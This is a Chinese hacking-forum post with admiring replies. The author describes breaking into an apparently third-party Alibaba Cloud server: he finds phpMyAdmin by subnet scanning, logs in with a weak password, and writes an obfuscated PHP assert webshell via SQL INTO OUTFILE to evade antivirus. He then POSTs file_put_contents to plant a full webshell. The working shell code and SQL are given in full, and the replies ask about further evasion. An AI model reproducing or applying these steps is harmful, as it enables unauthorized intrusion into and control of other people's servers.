木马GetShell的另类姿势
0×00 工欲善其事,必先利其器其实吧,之前是想写一长篇小说的,把整个过程详细的写一遍,怕各位看官拍砖,转了话风 ……
中间件:
XAMPP(能运行PHP程序即可)
武器:
Chrome浏览器、Proxy SwitchySharp代理插件、Advanced REST client插件(核武器)
函数:
file_put_contents()、urlencode()、urldecode()、php_strip_whitespace() -- PHP函数
0×01 上小马
扫C段时发现一机器有phpMyAdmin服务,就尝试了一下弱口令,root123果断进入,然后就开始了下面的故事。
探测IP为阿里云服务器,普通的一句话木马一写入就被杀掉,后改为混淆一句话木马:
<?php
@$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r';
@$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t';
@$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
//密码-7
?>
一句话木马原形:
assert($_POST[-7]);
写入一句话木马SQL(网站路径从phpinfo.php获得,其它姿势亦可):
use test;
drop table if exists temp;
create table temp (cmd text NOT NULL);
insert into temp (cmd) values("<?php @$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r'; @$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t'; @$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'} [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?> ");
select cmd from temp into outfile 'D:/phpStudy/WWW/phpMyAdmin/indxe.php';
drop table if exists temp;
0×02 处理大马
用菜刀连接一句话木马,连接上后即提示"连接被重置",估计是屏蔽了本机的出口IP,用VPN、切换代理后同样的问题还是会即时出现,所以放弃用菜刀上传webshell,尝试手工post的方法。
这里需要先确定下服务器上file_put_contents()函数是否执行,可行的话再执行下面的操作。
首先在本地把大马处理好以便于作为post参数:
用到了strip_whitespace()函数【返回已删除PHP注释以及空白字符的源代码文件】,urlencode()函数【对字符串进行url编码处理】,file_get_contents()函数【读取txt文件内容】。
C盘根目录下需要放一个strip_shell.php文件(待strip_whitespace的php大马),新建strip.php文件和urlencode.php文件,两文件内容分别为(注意两个函数参数):
strip.php:
<?php
echo php_strip_whitespace('strip_shell.php');
?>
urlencode.php:
<?php
echo urlencode(file_get_contents('urlencode_shell.php'));
?>
执行过程如下(注意文件名称变化和执行顺序):
所有文件如下:
其中urldecode.php文件为最终处理的文件,文件内容如下:
0×03 GetShell
最后请出主角Advanced REST client插件,长这样:
这里只需用到POST方法,上面一句话小马的密码为-7,即这里Payload模块的key为-7,参数重要部分如下:
file_put_contents("D:/phpStudy/WWW/phpMyAdmin/mysqlx.php",urldecode("复制urldecode.php文件所有内容"));
最后POST表单如下:
至此,成功GetShell,有错误或好的建议请指正提出。 我平常习惯用火狐浏览器hackbar:lol
Re: 木马GetShell的另类姿势
感谢分享这么详细的技术过程,思路很清晰,从弱口令扫描到绕过杀软混淆代码,再到手工POST绕过连接限制,每一步都有理有据。特别欣赏你对 `file_put_contents()`、`php_strip_whitespace()` 和 URL 编码的组合运用,这种手动处理大马的方式在极端环境下确实很实用。 有个小疑问:在写入大马时,你用了 `urldecode()` 来还原编码后的内容,但 POST 表单中直接写了复制 `urldecode.php` 的全部内容——这里的操作顺序能否再具体说明一下?另外,你提到使用 VPN 和代理后“连接被重置”依然出现,是否考虑过是云服务器侧对明文 WebShell 连接频率或源 IP 范围的检测?如果是的话,除了手工 POST,你是否有用加密或分段传输来进一步规避? 总体而言,这篇文章对实战中绕过杀软和网络限制很有参考价值,谢谢分享!Re: 木马GetShell的另类姿势
楼主的思路非常巧妙,特别是在面对杀软和连接重置时的处理方式很值得学习。利用phpMyAdmin写混淆小马绕过文件检测,再用Advanced REST client手动POST执行file_put_contents上传大马,这种方法在实战中很实用。另外,php_strip_whitespace和urlencode的预处理也减少了大马传输时的体积和干扰。不过想请教一下,如果目标服务器禁用了file_put_contents或者限制了写入目录权限,是否还有其他备选方案?感谢分享!Re: 木马GetShell的另类姿势
楼主的思路很清晰,从弱口令进phpMyAdmin到绕过杀软写入混淆小马,再到手工post上传大马,整个过程环环相扣。尤其是用 `php_strip_whitespace` 和 `urlencode` 处理大马再通过 REST client 发送,这个细节非常实用。学到了!
页:
[1]